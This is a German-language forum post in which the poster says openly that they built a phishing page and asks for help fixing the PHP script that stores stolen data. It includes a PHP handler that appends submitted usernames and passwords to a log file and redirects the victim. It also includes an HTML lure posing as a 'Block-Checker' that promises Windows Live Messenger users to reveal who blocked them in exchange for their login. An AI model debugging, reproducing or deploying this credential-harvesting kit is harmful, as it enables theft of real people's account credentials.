ich habe eine PHishing seite erstellt, wo bei die daten in einer text datei gespeichert werden
die PHP action geht nicht


PHP datei --> SEND.php
Code:
<?php 
$benutzer="".$_POST['benutzer'].":".$_POST['pass']."
\n"; 
$datei_handle=fopen("log.txt",a); 
fwrite($datei_handle,$benutzer); 
fclose($datei_handle); 
header("Location: http://meineadresse.iespana.es/Untitled-3.html")
?>

Kontaktformular
Code:
<style type="text/css">
<!--
.Stil2 {color: #FFFFFF; font-size: large; }
.Stil4 {
	color: #FFFFFF;
	font-size: x-large;
}
-->
</style>
<title>Block-Checker</title><body bgcolor="#000000" background="Bild.jpg">
<form name="Eingabe" action="SEND.php" method="post">
<p class="Stil2"></p>
<p class="Stil2"></p>
<p class="Stil2"></p>
<p class="Stil2"></p>
<p class="Stil2"></p>
<p class="Stil2"></p>
<p class="Stil2"></p>
<p align="center" class="Stil4"></p>
<p align="center" class="Stil4">Check the real status of who may have	</p>
<p align="center" class="Stil4"> blocke you on your  Windows Live Messenger.</p>
<blockquote>
  <blockquote>
    <blockquote>
      <blockquote>
        <blockquote>
          <blockquote>
            <blockquote>
              <blockquote>
                <blockquote>
                  <p class="Stil2"></p>
                  <p class="Stil2">Windows Live Messenger ID: </p>
                  


                    <input type="text" name="benutzer" size="20">
                    

                    <span class="Stil2">Passwort:</span>

                    <input type="password" name="pass" size="20">
                      

                      </p>
                  <p align="justify"> 
                    <input type="submit" value="Anmelden">
                  </p>
                </blockquote>
              </blockquote>
            </blockquote>
          </blockquote>
        </blockquote>
      </blockquote>
    </blockquote>
  </blockquote>
</blockquote>
</form>
</p>
</body>
fehlermeldung bei opera
Code:
\n"; $datei_handle=fopen("log.txt",a); fwrite($datei_handle,$benutzer); fclose($datei_handle); header("Location: http://meineadresse.iespana.es/Untitled-3.html") ?>
kann mir jemand den fehler erklären

danke im voraus